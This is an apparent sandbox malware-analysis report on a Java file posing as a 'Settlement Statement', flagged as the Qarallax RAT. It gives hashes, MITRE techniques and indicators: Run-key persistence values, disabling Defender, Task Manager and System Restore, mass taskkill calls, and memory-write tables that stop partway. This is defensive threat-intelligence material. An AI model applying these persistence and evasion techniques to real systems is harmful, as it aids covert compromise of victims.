qarallax | 4a2540d400c6c1ceb0ea0f56012631c14b5c29c00c7f9149de2d50feaa55c7c8

Analysis

max time kernel
149s
max time network
145s
platform
windows10_x64
resource
win10v200722
submitted
19-08-2020 13:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Settlement Statement.jar
Size

410KB
MD5

067b448f548254e2442e5c63e74f8dd9
SHA1

e35fb2ffd0c72c9dacdb74bcbd22762cb110d2a7
SHA256

4a2540d400c6c1ceb0ea0f56012631c14b5c29c00c7f9149de2d50feaa55c7c8
SHA512

e5928f53a2bfa6d1fdca8baee6887540eb524b2ad2ca0ef58c4bd62144ce06a87a1b9cdcef9a8882109170fa39ed9e5568823d09839daaf71ad5755249faceb0

Score

10^/10

persistence evasion trojan qarallax

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

resource	yara_rule
behavioral2/files/0x000100000001ae42-55.dat	qarallax_dll

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
3816	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\EfAgwmH = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\hmJMe\\Lwqbj.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run\EfAgwmH = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\hmJMe\\Lwqbj.class\""	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\hmJMe\Desktop.ini	java.exe
File created	C:\Users\Admin\hmJMe\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\hmJMe\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\hmJMe\Desktop.ini	attrib.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\ZoTnd	java.exe
File opened for modification	C:\Windows\System32\ZoTnd	java.exe

Kills process with taskkill 19 IoCs

evasion

pid	Process
3716	taskkill.exe
3544	taskkill.exe
2804	taskkill.exe
4548	taskkill.exe
500	taskkill.exe
2492	taskkill.exe
4264	taskkill.exe
4696	taskkill.exe
660	taskkill.exe
1308	taskkill.exe
3164	taskkill.exe
3728	taskkill.exe
2112	taskkill.exe
4384	taskkill.exe
1900	taskkill.exe
2792	taskkill.exe
4140	taskkill.exe
4808	taskkill.exe
660	taskkill.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1780	powershell.exe
1780	powershell.exe
1780	powershell.exe
1780	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3816	java.exe

Suspicious use of AdjustPrivilegeToken 125 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1896	WMIC.exe
Token: SeSecurityPrivilege	1896	WMIC.exe
Token: SeTakeOwnershipPrivilege	1896	WMIC.exe
Token: SeLoadDriverPrivilege	1896	WMIC.exe
Token: SeSystemProfilePrivilege	1896	WMIC.exe
Token: SeSystemtimePrivilege	1896	WMIC.exe
Token: SeProfSingleProcessPrivilege	1896	WMIC.exe
Token: SeIncBasePriorityPrivilege	1896	WMIC.exe
Token: SeCreatePagefilePrivilege	1896	WMIC.exe
Token: SeBackupPrivilege	1896	WMIC.exe
Token: SeRestorePrivilege	1896	WMIC.exe
Token: SeShutdownPrivilege	1896	WMIC.exe
Token: SeDebugPrivilege	1896	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1896	WMIC.exe
Token: SeRemoteShutdownPrivilege	1896	WMIC.exe
Token: SeUndockPrivilege	1896	WMIC.exe
Token: SeManageVolumePrivilege	1896	WMIC.exe
Token: 33	1896	WMIC.exe
Token: 34	1896	WMIC.exe
Token: 35	1896	WMIC.exe
Token: 36	1896	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1896	WMIC.exe
Token: SeSecurityPrivilege	1896	WMIC.exe
Token: SeTakeOwnershipPrivilege	1896	WMIC.exe
Token: SeLoadDriverPrivilege	1896	WMIC.exe
Token: SeSystemProfilePrivilege	1896	WMIC.exe
Token: SeSystemtimePrivilege	1896	WMIC.exe
Token: SeProfSingleProcessPrivilege	1896	WMIC.exe
Token: SeIncBasePriorityPrivilege	1896	WMIC.exe
Token: SeCreatePagefilePrivilege	1896	WMIC.exe
Token: SeBackupPrivilege	1896	WMIC.exe
Token: SeRestorePrivilege	1896	WMIC.exe
Token: SeShutdownPrivilege	1896	WMIC.exe
Token: SeDebugPrivilege	1896	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1896	WMIC.exe
Token: SeRemoteShutdownPrivilege	1896	WMIC.exe
Token: SeUndockPrivilege	1896	WMIC.exe
Token: SeManageVolumePrivilege	1896	WMIC.exe
Token: 33	1896	WMIC.exe
Token: 34	1896	WMIC.exe
Token: 35	1896	WMIC.exe
Token: 36	1896	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2404	WMIC.exe
Token: SeSecurityPrivilege	2404	WMIC.exe
Token: SeTakeOwnershipPrivilege	2404	WMIC.exe
Token: SeLoadDriverPrivilege	2404	WMIC.exe
Token: SeSystemProfilePrivilege	2404	WMIC.exe
Token: SeSystemtimePrivilege	2404	WMIC.exe
Token: SeProfSingleProcessPrivilege	2404	WMIC.exe
Token: SeIncBasePriorityPrivilege	2404	WMIC.exe
Token: SeCreatePagefilePrivilege	2404	WMIC.exe
Token: SeBackupPrivilege	2404	WMIC.exe
Token: SeRestorePrivilege	2404	WMIC.exe
Token: SeShutdownPrivilege	2404	WMIC.exe
Token: SeDebugPrivilege	2404	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2404	WMIC.exe
Token: SeRemoteShutdownPrivilege	2404	WMIC.exe
Token: SeUndockPrivilege	2404	WMIC.exe
Token: SeManageVolumePrivilege	2404	WMIC.exe
Token: 33	2404	WMIC.exe
Token: 34	2404	WMIC.exe
Token: 35	2404	WMIC.exe
Token: 36	2404	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2404	WMIC.exe
Token: SeSecurityPrivilege	2404	WMIC.exe
Token: SeTakeOwnershipPrivilege	2404	WMIC.exe
Token: SeLoadDriverPrivilege	2404	WMIC.exe
Token: SeSystemProfilePrivilege	2404	WMIC.exe
Token: SeSystemtimePrivilege	2404	WMIC.exe
Token: SeProfSingleProcessPrivilege	2404	WMIC.exe
Token: SeIncBasePriorityPrivilege	2404	WMIC.exe
Token: SeCreatePagefilePrivilege	2404	WMIC.exe
Token: SeBackupPrivilege	2404	WMIC.exe
Token: SeRestorePrivilege	2404	WMIC.exe
Token: SeShutdownPrivilege	2404	WMIC.exe
Token: SeDebugPrivilege	2404	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2404	WMIC.exe
Token: SeRemoteShutdownPrivilege	2404	WMIC.exe
Token: SeUndockPrivilege	2404	WMIC.exe
Token: SeManageVolumePrivilege	2404	WMIC.exe
Token: 33	2404	WMIC.exe
Token: 34	2404	WMIC.exe
Token: 35	2404	WMIC.exe
Token: 36	2404	WMIC.exe
Token: SeDebugPrivilege	1900	taskkill.exe
Token: SeDebugPrivilege	1780	powershell.exe
Token: SeDebugPrivilege	660	taskkill.exe
Token: SeDebugPrivilege	1308	taskkill.exe
Token: SeDebugPrivilege	3164	taskkill.exe
Token: SeDebugPrivilege	2792	taskkill.exe
Token: SeDebugPrivilege	3716	taskkill.exe
Token: SeDebugPrivilege	3544	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1780	powershell.exe
Token: SeSecurityPrivilege	1780	powershell.exe
Token: SeTakeOwnershipPrivilege	1780	powershell.exe
Token: SeLoadDriverPrivilege	1780	powershell.exe
Token: SeSystemProfilePrivilege	1780	powershell.exe
Token: SeSystemtimePrivilege	1780	powershell.exe
Token: SeProfSingleProcessPrivilege	1780	powershell.exe
Token: SeIncBasePriorityPrivilege	1780	powershell.exe
Token: SeCreatePagefilePrivilege	1780	powershell.exe
Token: SeBackupPrivilege	1780	powershell.exe
Token: SeRestorePrivilege	1780	powershell.exe
Token: SeShutdownPrivilege	1780	powershell.exe
Token: SeDebugPrivilege	1780	powershell.exe
Token: SeSystemEnvironmentPrivilege	1780	powershell.exe
Token: SeRemoteShutdownPrivilege	1780	powershell.exe
Token: SeUndockPrivilege	1780	powershell.exe
Token: SeManageVolumePrivilege	1780	powershell.exe
Token: 33	1780	powershell.exe
Token: 34	1780	powershell.exe
Token: 35	1780	powershell.exe
Token: 36	1780	powershell.exe
Token: SeDebugPrivilege	4140	taskkill.exe
Token: SeDebugPrivilege	4808	taskkill.exe
Token: SeDebugPrivilege	660	taskkill.exe
Token: SeDebugPrivilege	3728	taskkill.exe
Token: SeDebugPrivilege	500	taskkill.exe
Token: SeDebugPrivilege	2804	taskkill.exe
Token: SeDebugPrivilege	2492	taskkill.exe
Token: SeDebugPrivilege	2112	taskkill.exe
Token: SeDebugPrivilege	4264	taskkill.exe
Token: SeDebugPrivilege	4384	taskkill.exe
Token: SeDebugPrivilege	4548	taskkill.exe
Token: SeDebugPrivilege	4696	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3816	java.exe

Suspicious use of WriteProcessMemory 412 IoCs

description	pid	Process	procid_target
PID 3816 wrote to memory of 1496	3816	java.exe	67
PID 3816 wrote to memory of 1496	3816	java.exe	67
PID 3816 wrote to memory of 1656	3816	java.exe	69
PID 3816 wrote to memory of 1656	3816	java.exe	69
PID 1656 wrote to memory of 1896	1656	cmd.exe	71
PID 1656 wrote to memory of 1896	1656	cmd.exe	71
PID 3816 wrote to memory of 2112	3816	java.exe	72
PID 3816 wrote to memory of 2112	3816	java.exe	72
PID 2112 wrote to memory of 2404	2112	cmd.exe	74
PID 2112 wrote to memory of 2404	2112	cmd.exe	74
PID 3816 wrote to memory of 684	3816	java.exe	78
PID 3816 wrote to memory of 684	3816	java.exe	78
PID 3816 wrote to memory of 2208	3816	java.exe	80
PID 3816 wrote to memory of 2208	3816	java.exe	80
PID 3816 wrote to memory of 2496	3816	java.exe	82
PID 3816 wrote to memory of 2496	3816	java.exe	82
PID 3816 wrote to memory of 2492	3816	java.exe	84
PID 3816 wrote to memory of 2492	3816	java.exe	84
PID 3816 wrote to memory of 3552	3816	java.exe	85
PID 3816 wrote to memory of 3552	3816	java.exe	85
PID 3816 wrote to memory of 3804	3816	java.exe	87
PID 3816 wrote to memory of 3804	3816	java.exe	87
PID 3816 wrote to memory of 500	3816	java.exe	89
PID 3816 wrote to memory of 500	3816	java.exe	89
PID 3816 wrote to memory of 640	3816	java.exe	91
PID 3816 wrote to memory of 640	3816	java.exe	91
PID 3816 wrote to memory of 1460	3816	java.exe	94
PID 3816 wrote to memory of 1460	3816	java.exe	94
PID 3816 wrote to memory of 1780	3816	java.exe	95
PID 3816 wrote to memory of 1780	3816	java.exe	95
PID 3816 wrote to memory of 1900	3816	java.exe	97
PID 3816 wrote to memory of 1900	3816	java.exe	97
PID 3816 wrote to memory of 2404	3816	java.exe	100
PID 3816 wrote to memory of 2404	3816	java.exe	100
PID 3816 wrote to memory of 2556	3816	java.exe	101
PID 3816 wrote to memory of 2556	3816	java.exe	101
PID 3816 wrote to memory of 1264	3816	java.exe	103
PID 3816 wrote to memory of 1264	3816	java.exe	103
PID 3816 wrote to memory of 3328	3816	java.exe	105
PID 3816 wrote to memory of 3328	3816	java.exe	105
PID 3816 wrote to memory of 2824	3816	java.exe	108
PID 3816 wrote to memory of 2824	3816	java.exe	108
PID 3816 wrote to memory of 3320	3816	java.exe	109
PID 3816 wrote to memory of 3320	3816	java.exe	109
PID 3816 wrote to memory of 3008	3816	java.exe	112
PID 3816 wrote to memory of 3008	3816	java.exe	112
PID 3816 wrote to memory of 64	3816	java.exe	113
PID 3816 wrote to memory of 64	3816	java.exe	113
PID 3816 wrote to memory of 748	3816	java.exe	116
PID 3816 wrote to memory of 748	3816	java.exe	116
PID 3816 wrote to memory of 3112	3816	java.exe	117
PID 3816 wrote to memory of 3112	3816	java.exe	117
PID 3816 wrote to memory of 1824	3816	java.exe	120
PID 3816 wrote to memory of 1824	3816	java.exe	120
PID 3816 wrote to memory of 3368	3816	java.exe	121
PID 3816 wrote to memory of 3368	3816	java.exe	121
PID 3816 wrote to memory of 1560	3816	java.exe	124
PID 3816 wrote to memory of 1560	3816	java.exe	124
PID 3816 wrote to memory of 1088	3816	java.exe	125
PID 3816 wrote to memory of 1088	3816	java.exe	125
PID 3816 wrote to memory of 1344	3816	java.exe	129
PID 3816 wrote to memory of 3160	3816	java.exe	128
PID 3816 wrote to memory of 1344	3816	java.exe	129
PID 3816 wrote to memory of 3160	3816	java.exe	128
PID 3816 wrote to memory of 3432	3816	java.exe	132
PID 3816 wrote to memory of 3432	3816	java.exe	132
PID 3816 wrote to memory of 3164	3816	java.exe	133
PID 3816 wrote to memory of 3164	3816	java.exe	133
PID 1460 wrote to memory of 724	1460	cmd.exe	136
PID 1460 wrote to memory of 724	1460	cmd.exe	136
PID 3816 wrote to memory of 660	3816	java.exe	137
PID 3816 wrote to memory of 660	3816	java.exe	137
PID 3816 wrote to memory of 1988	3816	java.exe	138
PID 3816 wrote to memory of 1988	3816	java.exe	138
PID 3816 wrote to memory of 2812	3816	java.exe	139
PID 3816 wrote to memory of 2812	3816	java.exe	139
PID 3816 wrote to memory of 1864	3816	java.exe	143
PID 3816 wrote to memory of 1864	3816	java.exe	143
PID 3816 wrote to memory of 1908	3816	java.exe	144
PID 3816 wrote to memory of 1908	3816	java.exe	144
PID 3816 wrote to memory of 1564	3816	java.exe	147
PID 3816 wrote to memory of 1564	3816	java.exe	147
PID 3816 wrote to memory of 796	3816	java.exe	148
PID 3816 wrote to memory of 796	3816	java.exe	148
PID 3816 wrote to memory of 692	3816	java.exe	151
PID 3816 wrote to memory of 692	3816	java.exe	151
PID 3816 wrote to memory of 2764	3816	java.exe	154
PID 3816 wrote to memory of 2764	3816	java.exe	154
PID 3816 wrote to memory of 2584	3816	java.exe	155
PID 3816 wrote to memory of 2584	3816	java.exe	155
PID 3816 wrote to memory of 2876	3816	java.exe	158
PID 3816 wrote to memory of 2876	3816	java.exe	158
PID 1460 wrote to memory of 984	1460	cmd.exe	159
PID 1460 wrote to memory of 984	1460	cmd.exe	159
PID 3816 wrote to memory of 2404	3816	java.exe	161
PID 3816 wrote to memory of 2404	3816	java.exe	161
PID 3816 wrote to memory of 900	3816	java.exe	163
PID 3816 wrote to memory of 900	3816	java.exe	163
PID 3816 wrote to memory of 1308	3816	java.exe	164
PID 3816 wrote to memory of 1308	3816	java.exe	164
PID 3816 wrote to memory of 1864	3816	java.exe	167
PID 3816 wrote to memory of 1864	3816	java.exe	167
PID 3816 wrote to memory of 1564	3816	java.exe	169
PID 3816 wrote to memory of 1564	3816	java.exe	169
PID 3816 wrote to memory of 792	3816	java.exe	170
PID 3816 wrote to memory of 792	3816	java.exe	170
PID 792 wrote to memory of 2812	792	cmd.exe	173
PID 792 wrote to memory of 2812	792	cmd.exe	173
PID 792 wrote to memory of 1988	792	cmd.exe	174
PID 792 wrote to memory of 1988	792	cmd.exe	174
PID 3816 wrote to memory of 1344	3816	java.exe	175
PID 3816 wrote to memory of 1344	3816	java.exe	175
PID 3816 wrote to memory of 3164	3816	java.exe	176
PID 3816 wrote to memory of 3164	3816	java.exe	176
PID 1344 wrote to memory of 988	1344	cmd.exe	179
PID 1344 wrote to memory of 988	1344	cmd.exe	179
PID 1344 wrote to memory of 3108	1344	cmd.exe	180
PID 1344 wrote to memory of 3108	1344	cmd.exe	180
PID 3816 wrote to memory of 1560	3816	java.exe	181
PID 3816 wrote to memory of 1560	3816	java.exe	181
PID 1560 wrote to memory of 1348	1560	cmd.exe	183
PID 1560 wrote to memory of 1348	1560	cmd.exe	183
PID 1560 wrote to memory of 2164	1560	cmd.exe	184
PID 1560 wrote to memory of 2164	1560	cmd.exe	184
PID 3816 wrote to memory of 640	3816	java.exe	185
PID 3816 wrote to memory of 640	3816	java.exe	185
PID 640 wrote to memory of 2576	640	cmd.exe	188
PID 640 wrote to memory of 2576	640	cmd.exe	188
PID 3816 wrote to memory of 2792	3816	java.exe	189
PID 3816 wrote to memory of 2792	3816	java.exe	189
PID 640 wrote to memory of 1248	640	cmd.exe	191
PID 640 wrote to memory of 1248	640	cmd.exe	191
PID 3816 wrote to memory of 728	3816	java.exe	192
PID 3816 wrote to memory of 728	3816	java.exe	192
PID 728 wrote to memory of 3776	728	cmd.exe	195
PID 728 wrote to memory of 3776	728	cmd.exe	195
PID 728 wrote to memory of 984	728	cmd.exe	196
PID 728 wrote to memory of 984	728	cmd.exe	196
PID 3816 wrote to memory of 1288	3816	java.exe	197
PID 3816 wrote to memory of 1288	3816	java.exe	197
PID 1288 wrote to memory of 988	1288	cmd.exe	199
PID 1288 wrote to memory of 988	1288	cmd.exe	199
PID 1288 wrote to memory of 3328	1288	cmd.exe	200
PID 1288 wrote to memory of 3328	1288	cmd.exe	200
PID 3816 wrote to memory of 3164	3816	java.exe	201
PID 3816 wrote to memory of 3164	3816	java.exe	201
PID 3164 wrote to memory of 1156	3164	cmd.exe	203
PID 3164 wrote to memory of 1156	3164	cmd.exe	203
PID 3164 wrote to memory of 3428	3164	cmd.exe	204
PID 3164 wrote to memory of 3428	3164	cmd.exe	204
PID 3816 wrote to memory of 3004	3816	java.exe	205
PID 3816 wrote to memory of 3004	3816	java.exe	205
PID 3004 wrote to memory of 376	3004	cmd.exe	207
PID 3004 wrote to memory of 376	3004	cmd.exe	207
PID 3004 wrote to memory of 1572	3004	cmd.exe	208
PID 3004 wrote to memory of 1572	3004	cmd.exe	208
PID 3816 wrote to memory of 792	3816	java.exe	209
PID 3816 wrote to memory of 792	3816	java.exe	209
PID 792 wrote to memory of 1716	792	cmd.exe	211
PID 792 wrote to memory of 1716	792	cmd.exe	211
PID 792 wrote to memory of 2316	792	cmd.exe	212
PID 792 wrote to memory of 2316	792	cmd.exe	212
PID 3816 wrote to memory of 1252	3816	java.exe	213
PID 3816 wrote to memory of 1252	3816	java.exe	213
PID 1252 wrote to memory of 848	1252	cmd.exe	215
PID 1252 wrote to memory of 848	1252	cmd.exe	215
PID 1252 wrote to memory of 1268	1252	cmd.exe	216
PID 1252 wrote to memory of 1268	1252	cmd.exe	216
PID 3816 wrote to memory of 3716	3816	java.exe	217
PID 3816 wrote to memory of 3716	3816	java.exe	217
PID 3816 wrote to memory of 660	3816	java.exe	218
PID 3816 wrote to memory of 660	3816	java.exe	218
PID 660 wrote to memory of 3328	660	cmd.exe	221
PID 660 wrote to memory of 3328	660	cmd.exe	221
PID 660 wrote to memory of 3572	660	cmd.exe	222
PID 660 wrote to memory of 3572	660	cmd.exe	222
PID 3816 wrote to memory of 1580	3816	java.exe	224
PID 3816 wrote to memory of 1580	3816	java.exe	224
PID 1580 wrote to memory of 2824	1580	cmd.exe	226
PID 1580 wrote to memory of 2824	1580	cmd.exe	226
PID 1580 wrote to memory of 8	1580	cmd.exe	227
PID 1580 wrote to memory of 8	1580	cmd.exe	227
PID 3816 wrote to memory of 1584	3816	java.exe	228
PID 3816 wrote to memory of 1584	3816	java.exe	228
PID 1584 wrote to memory of 1268	1584	cmd.exe	230
PID 1584 wrote to memory of 1268	1584	cmd.exe	230
PID 1584 wrote to memory of 2804	1584	cmd.exe	231
PID 1584 wrote to memory of 2804	1584	cmd.exe	231
PID 3816 wrote to memory of 3328	3816	java.exe	232
PID 3816 wrote to memory of 3328	3816	java.exe	232
PID 3328 wrote to memory of 1308	3328	cmd.exe	234
PID 3328 wrote to memory of 1308	3328	cmd.exe	234
PID 3328 wrote to memory of 1124	3328	cmd.exe	235
PID 3328 wrote to memory of 1124	3328	cmd.exe	235
PID 3816 wrote to memory of 2408	3816	java.exe	236
PID 3816 wrote to memory of 2408	3816	java.exe	236
PID 2408 wrote to memory of 8	2408	cmd.exe	238
PID 2408 wrote to memory of 8	2408	cmd.exe	238
PID 3816 wrote to memory of 3544	3816	java.exe	239
PID 3816 wrote to memory of 3544	3816	java.exe	239
PID 2408 wrote to memory of 1240	2408	cmd.exe	241
PID 2408 wrote to memory of 1240	2408	cmd.exe	241
PID 3816 wrote to memory of 1308	3816	java.exe	242
PID 3816 wrote to memory of 1308	3816	java.exe	242
PID 1308 wrote to memory of 8	1308	cmd.exe	244
PID 1308 wrote to memory of 8	1308	cmd.exe	244
PID 1308 wrote to memory of 3696	1308	cmd.exe	245
PID 1308 wrote to memory of 3696	1308	cmd.exe	245
PID 3816 wrote to memory of 64	3816	java.exe	246
PID 3816 wrote to memory of 64	3816	java.exe	246
PID 64 wrote to memory of 2644	64	cmd.exe	248
PID 64 wrote to memory of 2644	64	cmd.exe	248
PID 64 wrote to memory of 3884	64	cmd.exe	249
PID 64 wrote to memory of 3884	64	cmd.exe	249
PID 3816 wrote to memory of 1268	3816	java.exe	250
PID 3816 wrote to memory of 1268	3816	java.exe	250
PID 1268 wrote to memory of 3544	1268	cmd.exe	252
PID 1268 wrote to memory of 3544	1268	cmd.exe	252
PID 1268 wrote to memory of 3844	1268	cmd.exe	253
PID 1268 wrote to memory of 3844	1268	cmd.exe	253
PID 3816 wrote to memory of 3544	3816	java.exe	254
PID 3816 wrote to memory of 3544	3816	java.exe	254
PID 3544 wrote to memory of 4112	3544	cmd.exe	256
PID 3544 wrote to memory of 4112	3544	cmd.exe	256
PID 3816 wrote to memory of 4140	3816	java.exe	257
PID 3816 wrote to memory of 4140	3816	java.exe	257
PID 3544 wrote to memory of 4172	3544	cmd.exe	259
PID 3544 wrote to memory of 4172	3544	cmd.exe	259
PID 3816 wrote to memory of 4200	3816	java.exe	260
PID 3816 wrote to memory of 4200	3816	java.exe	260
PID 4200 wrote to memory of 4256	4200	cmd.exe	262
PID 4200 wrote to memory of 4256	4200	cmd.exe	262
PID 4200 wrote to memory of 4292	4200	cmd.exe	264
PID 4200 wrote to memory of 4292	4200	cmd.exe	264
PID 3816 wrote to memory of 4328	3816	java.exe	265
PID 3816 wrote to memory of 4328	3816	java.exe	265
PID 4328 wrote to memory of 4376	4328	cmd.exe	267
PID 4328 wrote to memory of 4376	4328	cmd.exe	267
PID 4328 wrote to memory of 4396	4328	cmd.exe	268
PID 4328 wrote to memory of 4396	4328	cmd.exe	268
PID 3816 wrote to memory of 4420	3816	java.exe	269
PID 3816 wrote to memory of 4420	3816	java.exe	269
PID 4420 wrote to memory of 4456	4420	cmd.exe	271
PID 4420 wrote to memory of 4456	4420	cmd.exe	271
PID 4420 wrote to memory of 4476	4420	cmd.exe	272
PID 4420 wrote to memory of 4476	4420	cmd.exe	272
PID 3816 wrote to memory of 4496	3816	java.exe	273
PID 3816 wrote to memory of 4496	3816	java.exe	273
PID 4496 wrote to memory of 4532	4496	cmd.exe	275
PID 4496 wrote to memory of 4532	4496	cmd.exe	275
PID 4496 wrote to memory of 4552	4496	cmd.exe	276
PID 4496 wrote to memory of 4552	4496	cmd.exe	276
PID 3816 wrote to memory of 4572	3816	java.exe	277
PID 3816 wrote to memory of 4572	3816	java.exe	277
PID 4572 wrote to memory of 4608	4572	cmd.exe	279
PID 4572 wrote to memory of 4608	4572	cmd.exe	279
PID 4572 wrote to memory of 4628	4572	cmd.exe	280
PID 4572 wrote to memory of 4628	4572	cmd.exe	280
PID 3816 wrote to memory of 4648	3816	java.exe	281
PID 3816 wrote to memory of 4648	3816	java.exe	281
PID 4648 wrote to memory of 4684	4648	cmd.exe	283
PID 4648 wrote to memory of 4684	4648	cmd.exe	283
PID 4648 wrote to memory of 4704	4648	cmd.exe	284
PID 4648 wrote to memory of 4704	4648	cmd.exe	284
PID 3816 wrote to memory of 4724	3816	java.exe	285
PID 3816 wrote to memory of 4724	3816	java.exe	285
PID 4724 wrote to memory of 4760	4724	cmd.exe	287
PID 4724 wrote to memory of 4760	4724	cmd.exe	287
PID 4724 wrote to memory of 4776	4724	cmd.exe	288
PID 4724 wrote to memory of 4776	4724	cmd.exe	288
PID 3816 wrote to memory of 4792	3816	java.exe	289
PID 3816 wrote to memory of 4792	3816	java.exe	289
PID 3816 wrote to memory of 4808	3816	java.exe	290
PID 3816 wrote to memory of 4808	3816	java.exe	290
PID 4792 wrote to memory of 4872	4792	cmd.exe	293
PID 4792 wrote to memory of 4872	4792	cmd.exe	293
PID 4792 wrote to memory of 4920	4792	cmd.exe	294
PID 4792 wrote to memory of 4920	4792	cmd.exe	294
PID 3816 wrote to memory of 4940	3816	java.exe	295
PID 3816 wrote to memory of 4940	3816	java.exe	295
PID 4940 wrote to memory of 4980	4940	cmd.exe	297
PID 4940 wrote to memory of 4980	4940	cmd.exe	297
PID 4940 wrote to memory of 5000	4940	cmd.exe	298
PID 4940 wrote to memory of 5000	4940	cmd.exe	298
PID 3816 wrote to memory of 5020	3816	java.exe	299
PID 3816 wrote to memory of 5020	3816	java.exe	299
PID 5020 wrote to memory of 5056	5020	cmd.exe	301
PID 5020 wrote to memory of 5056	5020	cmd.exe	301
PID 5020 wrote to memory of 5076	5020	cmd.exe	302
PID 5020 wrote to memory of 5076	5020	cmd.exe	302
PID 3816 wrote to memory of 5096	3816	java.exe	303
PID 3816 wrote to memory of 5096	3816	java.exe	303
PID 5096 wrote to memory of 3780	5096	cmd.exe	305
PID 5096 wrote to memory of 3780	5096	cmd.exe	305
PID 5096 wrote to memory of 1864	5096	cmd.exe	306
PID 5096 wrote to memory of 1864	5096	cmd.exe	306
PID 3816 wrote to memory of 900	3816	java.exe	307
PID 3816 wrote to memory of 900	3816	java.exe	307
PID 900 wrote to memory of 2564	900	cmd.exe	309
PID 900 wrote to memory of 2564	900	cmd.exe	309
PID 900 wrote to memory of 3160	900	cmd.exe	310
PID 900 wrote to memory of 3160	900	cmd.exe	310
PID 3816 wrote to memory of 1908	3816	java.exe	311
PID 3816 wrote to memory of 1908	3816	java.exe	311
PID 1908 wrote to memory of 3572	1908	cmd.exe	313
PID 1908 wrote to memory of 3572	1908	cmd.exe	313
PID 1908 wrote to memory of 3860	1908	cmd.exe	314
PID 1908 wrote to memory of 3860	1908	cmd.exe	314
PID 3816 wrote to memory of 3580	3816	java.exe	315
PID 3816 wrote to memory of 3580	3816	java.exe	315
PID 3580 wrote to memory of 2248	3580	cmd.exe	317
PID 3580 wrote to memory of 2248	3580	cmd.exe	317
PID 3580 wrote to memory of 632	3580	cmd.exe	318
PID 3580 wrote to memory of 632	3580	cmd.exe	318
PID 3816 wrote to memory of 64	3816	java.exe	319
PID 3816 wrote to memory of 64	3816	java.exe	319
PID 3816 wrote to memory of 660	3816	java.exe	321
PID 3816 wrote to memory of 660	3816	java.exe	321
PID 64 wrote to memory of 2552	64	cmd.exe	323
PID 64 wrote to memory of 2552	64	cmd.exe	323
PID 64 wrote to memory of 1252	64	cmd.exe	324
PID 64 wrote to memory of 1252	64	cmd.exe	324
PID 3816 wrote to memory of 728	3816	java.exe	325
PID 3816 wrote to memory of 728	3816	java.exe	325
PID 728 wrote to memory of 2672	728	cmd.exe	327
PID 728 wrote to memory of 2672	728	cmd.exe	327
PID 728 wrote to memory of 3660	728	cmd.exe	328
PID 728 wrote to memory of 3660	728	cmd.exe	328
PID 3816 wrote to memory of 1716	3816	java.exe	329
PID 3816 wrote to memory of 1716	3816	java.exe	329
PID 1716 wrote to memory of 4176	1716	cmd.exe	331
PID 1716 wrote to memory of 4176	1716	cmd.exe	331
PID 1716 wrote to memory of 4220	1716	cmd.exe	332
PID 1716 wrote to memory of 4220	1716	cmd.exe	332
PID 3816 wrote to memory of 4256	3816	java.exe	333
PID 3816 wrote to memory of 4256	3816	java.exe	333
PID 4256 wrote to memory of 4248	4256	cmd.exe	335
PID 4256 wrote to memory of 4248	4256	cmd.exe	335
PID 4256 wrote to memory of 4240	4256	cmd.exe	336
PID 4256 wrote to memory of 4240	4256	cmd.exe	336
PID 3816 wrote to memory of 4160	3816	java.exe	337
PID 3816 wrote to memory of 4160	3816	java.exe	337
PID 4160 wrote to memory of 4400	4160	cmd.exe	339
PID 4160 wrote to memory of 4400	4160	cmd.exe	339
PID 4160 wrote to memory of 4436	4160	cmd.exe	340
PID 4160 wrote to memory of 4436	4160	cmd.exe	340
PID 3816 wrote to memory of 4484	3816	java.exe	341
PID 3816 wrote to memory of 4484	3816	java.exe	341
PID 4484 wrote to memory of 4536	4484	cmd.exe	343
PID 4484 wrote to memory of 4536	4484	cmd.exe	343
PID 4484 wrote to memory of 4556	4484	cmd.exe	344
PID 4484 wrote to memory of 4556	4484	cmd.exe	344
PID 3816 wrote to memory of 4588	3816	java.exe	345
PID 3816 wrote to memory of 4588	3816	java.exe	345
PID 4588 wrote to memory of 4640	4588	cmd.exe	347
PID 4588 wrote to memory of 4640	4588	cmd.exe	347
PID 4588 wrote to memory of 4688	4588	cmd.exe	348
